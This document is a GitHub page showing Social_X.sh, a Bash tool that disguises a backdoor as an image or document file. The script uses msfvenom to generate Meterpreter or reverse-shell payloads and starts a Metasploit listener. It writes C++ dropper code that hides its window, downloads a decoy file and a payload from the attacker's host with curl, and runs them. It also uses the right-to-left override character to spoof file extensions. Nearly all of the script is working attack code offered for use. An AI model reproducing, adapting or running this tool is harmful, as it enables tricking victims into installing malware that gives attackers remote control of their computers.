forked from AzizKpln/Social_X
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathSocial_X.sh
executable file
·239 lines (218 loc) · 10.7 KB
/
Social_X.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
lightblue=`tput setaf 14`
green=`tput setaf 46`
RED=`tput setaf 196`
yellow=`tput setaf 11`
purple=`tput setaf 129`
reset=`tput sgr0`
clear
if [ $(whoami) != "root" ];then
echo -e "${RED}Please run this script with root privilages."
echo -e "\n${lightblue}sudo bash setup.sh"
exit
fi
sudo rm CppCodes/* &> /dev/null
sudo rm SOCIALX_BACKDOOR/*.exe &> /dev/null
sudo rm wsgi_sw/Upload_Server/images/* &>/dev/null
sudo killall -9 xterm
checK=$(sudo lsof -i :80)
if [[ $checK != "" ]];then
kill=$(sudo lsof -i :80 | awk '{print $1}' | cut -d "D" -f 2)
echo -e "${RED}[!]${purple} Port Number 80 is Already IN USE!!\n"
read -p "${blue}[?]${green} Would you like me to kill the related port number?[y/n]" sor
if [[ $sor == "y" ]] || [[ $sor == "Y" ]] || [[ $sor == "yes" ]];then
sudo killall -9 $kill
fi
fi
xterm -hold -e "echo -e 'Input Your Root Password\n~Social_X~' && sudo python3 wsgi_sw/Upload_Server/app.py" &> /dev/null &
function banner(){
echo ${green}
figlet Social_X -f banner/larry3d.flf
echo ${green} ------------------------------------------------------------------
echo -e " By:Aziz Kaplan"
echo -e " Version:2.0"
echo ${green} ------------------------------------------------------------------
echo ${green} Note: This tool might not work probably on fully-detectable viruses.
}
function binder() {
clear
banner
echo ${RED}
echo ${lightblue}
echo -e "${green}[+]${lightblue}Enter The File Path That You Want To Embed(it could be jpg,docx,png etc.)"
echo -e "\n"
read -p "${lightblue}Social_X${purple}@${green}$(whoami)${RED}[${reset}~${RED}]${purple}" file_path
sudo cp $file_path wsgi_sw/Upload_Server/images/
file=$(basename $file_path)
IN="$file"
set -- "$IN"
ext_spoof=$(echo $file | cut -d "." -f 2 | rev)
clear
banner
echo "${purple}[+]${green} Have You Created A Backdoor?(Y/N or yes/no)"
echo -e "\n"
read -p "${lightblue}Social_X${purple}@${green}$(whoami)${RED}[${reset}~${RED}]${purple}" ask
if [[ $ask == "y" || $ask == "yes" || $ask == "YES" || $ask == "Y" ]]
then
clear
banner
echo "${green}[+]${lightblue}Path Of The Main(Will Be Executed) File:"
echo -e "\n"
read -p "${lightblue}Social_X${purple}@${green}$(whoami)${RED}[${reset}~${RED}]${purple}" exe_path
exe_file=$(basename $exe_path)
echo ${lightblue}
sudo cp $exe_path wsgi_sw/Upload_Server/images/
sudo mv wsgi_sw/Upload_Server/images/$exe_file wsgi_sw/Upload_Server/images/Search.exe
elif [[ $ask == "n" || $ask == "no" || $ask == "NO" || $ask == "N" ]] ;then
clear
banner
echo -e "${green}[+]${lightblue}Enter The File Name That You Want To Run[Input The Name With Extension]\n"
read -p "${lightblue}Social_X${purple}@${green}$(whoami)${RED}[${reset}~${RED}]${purple}" exe_file
clear
banner
checker=$(curl http://$(sudo ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p')/$file -s | grep 404)
if [[ $checker = "<title>404 Not Found</title>" ]];then
echo "${green}[+]This Name Is Available For File $file"
else
echo "${red}[-]Please Choose Another Name.This Name IS Already IN The Server $file"
exit
fi
checker1=$(curl http://$(sudo ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p')/$exe_file -s | grep 404)
if [[ $checker1 = "<title>404 Not Found</title>" ]];then
echo "${green}[+]This Name Is Available:$exe_file"
clear
banner
echo -e "${green} [#]${lightblue}Choose A Backdoor Option:"
echo -e "${green} |1|->${lightblue}Reverse Shell([Fully Undetectable])\n"
echo -e "${green} |2|->${lightblue}Metasploit Exe Trojan(NOT FUD-IT IS DETECTABLE)"
read -p "${purple}${lightblue}Social_X${purple}@${green}$(whoami)${RED}[${reset}~${RED}]${purple}" backdoor_option
if [[ $backdoor_option = "2" ]];then
exe_file="Search.exe"
clear
banner
private_ip=$(sudo ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p')
read -p "${green}[+]${lightblue}LHOST[Default:$private_ip]-->" ip
read -p "${green}[+]${lightblue}LPORT-->" port
if [[ $ip = "" ]];then
cd SOCIALX_BACKDOOR/
sudo msfvenom -p windows/meterpreter/reverse_https LHOST=$private_ip LPORT=$port -f exe > $exe_file
cd ../
echo use exploit/multi/handler > Metasploit/socialx.rc
echo set LHOST $private_ip >> Metasploit/socialx.rc
echo set PAYLOAD windows/meterpreter/reverse_https >> Metasploit/socialx.rc
echo set LPORT $port >> Metasploit/socialx.rc
echo exploit -j -z >> Metasploit/socialx.rc
else
cd SOCIALX_BACKDOOR/
sudo msfvenom -p windows/meterpreter/reverse_https LHOST=$ip LPORT=$port -f exe > $exe_file
cd ../
echo use exploit/multi/handler > Metasploit/socialx.rc
echo set PAYLOAD windows/meterpreter/reverse_https >> Metasploit/socialx.rc
echo set LHOST $ip >> Metasploit/socialx.rc
echo set LPORT $port >> Metasploit/socialx.rc
echo exploit -j -z >> Metasploit/socialx.rc
fi
echo msfconsole -r Metasploit/socialx.rc > socialx_backdoor.sh
chmod 755 socialx_backdoor.sh
xterm -hold -e ./socialx_backdoor.sh &
clear
banner
sudo mv SOCIALX_BACKDOOR/*.exe wsgi_sw/Upload_Server/images/Search.exe
elif [[ $backdoor_option = "1" ]];then
exe_file="Search.exe"
clear
banner
read -p "${green}[+]${lightblue} LHOST/RHOST[default:$(sudo ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p')]:" host
if [[ $host == "" ]];then
ipAddr=$(sudo ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p')
else
ipAddr=$host
fi
read -p "${green}[+]${lightblue} PORT[default:4444]" port
if [[ $host == "" ]];then
porT=4444
else
porT=$port
fi
echo "f='$ipAddr'" > reverseShell/ipPort.py
echo "f1=$porT" >> reverseShell/ipPort.py
sleep 5
cd reverseShell/ && wine $HOME'/.wine/drive_c/users/'$(whoami)'/Local Settings/Application Data/Programs/Python/Python36-32/Scripts/pyinstaller.exe' --hidden-import socket,os,subprocess,pyautogui --icon ../banner/icon.ico --onefile --upx-dir upx-3.96-win32/upx.exe -w client.py
cd ../
cp reverseShell/dist/client.exe SOCIALX_BACKDOOR/
rm -r reverseShell/*.spec reverseShell/__pycache__ reverseShell/build/ reverseShell/dist/
mv SOCIALX_BACKDOOR/client.exe SOCIALX_BACKDOOR/$exe_file
sudo cp SOCIALX_BACKDOOR/$exe_file wsgi_sw/Upload_Server/images/
sudo cp $file_path wsgi_sw/Upload_Server/images/
clear
banner
xterm -hold -e "cd reverseShell/ && python3 server.py" &> /dev/null &
fi
else
echo "${red}[-]Please Choose Another Name.This Name IS Already IN The Server $exe_file"
exit
fi
fi
Cpp
clear
banner
echo -e ${yellow}"\n[+]Dev-C++ Will Be Started. Compile the .cpp file\n"
echo -e "\n${RED}[!]${lightblue}PLEASE CONVERT THE FILE IN 'Social_X/CppCodes/' FOLDER OTHERWISE TOOL WILL NOT WORK PROPERLY!"
sleep 4
wine $HOME'/.wine/drive_c/Program Files (x86)/Dev-Cpp/devcpp.exe'
clear
banner
clear
banner
mv CppCodes/*.exe CppCodes/lif$ext_spoof.exe
cd CppCodes/
wine /root/.wine/drive_c/Program\ Files\ \(x86\)/Resource\ Hacker/ResourceHacker.exe
sudo cp /root/.wine/drive_c/users/root/Desktop/Social_X/*.exe ../wsgi_sw/Upload_Server/images/ &>/dev/null
look_zip=$(ls -l | awk {'print $9'} | cut -d "." -f 2)
left2right
cd ../
clear
banner
}
function Cpp() {
ip=$(sudo ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p')
CppCode='#include <iostream>'
CppCode1='#include <unistd.h>'
CppCode2='#include <windows.h>'
CppCode3='using namespace std;'
CppCode4='int WINAPI WinMain(HINSTANCE inst,HINSTANCE prev,LPSTR cmd,int show){'
CppCode5='ShowWindow(FindWindowA("ConsoleWindowClass", NULL), false);'
CppCode6='system("cmd /c curl http://'$ip'/images/'$file' -o %homepath%/AppData/Local/Temp/'$file'");'
CppCode7='system("cmd /c curl http://'$ip'/images/'$exe_file' -o %homepath%/AppData/Local/Temp/'$exe_file'");'
CppCode8='usleep(3000);'
CppCode9='system("cmd /c start %homepath%/AppData/Local/Temp/'$file'");'
CppCode10='usleep(3000);'
CppCode11='system("cmd /c curl http://'$ip'/images/'$exe_file' -o %homepath%/AppData/Local/Temp/'$exe_file'");'
CppCode12='system("powershell %homepath%/AppData/Local/Temp/'$exe_file'");'
CppCode13='FreeConsole();'
CppCode14='return 0;'
CppCode15='}'
echo $CppCode > CppCodes/socialx.cpp
echo $CppCode1 >> CppCodes/socialx.cpp
echo $CppCode2 >> CppCodes/socialx.cpp
echo $CppCode3 >> CppCodes/socialx.cpp
echo $CppCode4 >> CppCodes/socialx.cpp
echo $CppCode5 >> CppCodes/socialx.cpp
echo $CppCode6 >> CppCodes/socialx.cpp
echo $CppCode7 >> CppCodes/socialx.cpp
echo $CppCode8 >> CppCodes/socialx.cpp
echo $CppCode9 >> CppCodes/socialx.cpp
echo $CppCode10 >> CppCodes/socialx.cpp
echo $CppCode11 >> CppCodes/socialx.cpp
echo $CppCode12 >> CppCodes/socialx.cpp
echo $CppCode13 >> CppCodes/socialx.cpp
echo $CppCode14 >> CppCodes/socialx.cpp
echo $CppCode15 >> CppCodes/socialx.cpp
}
function left2right() {
echo "${green}[+]${lightblue}Chromium Will Be Opened.Please Click To ${RED}COPY ${lightblue} Button."
chromium http://unicode.flopp.net/c/202E /dev/null 2> /dev/null
}
binder
echo -e "${lightblue}[+]${green} Thanks for using Social_X :) <3"
echo -e "${lightblue}[+]${green} https://github.com/AzizKpln"
echo -e "${lightblue}[+]${green} Youtube:Aziz Kaplan"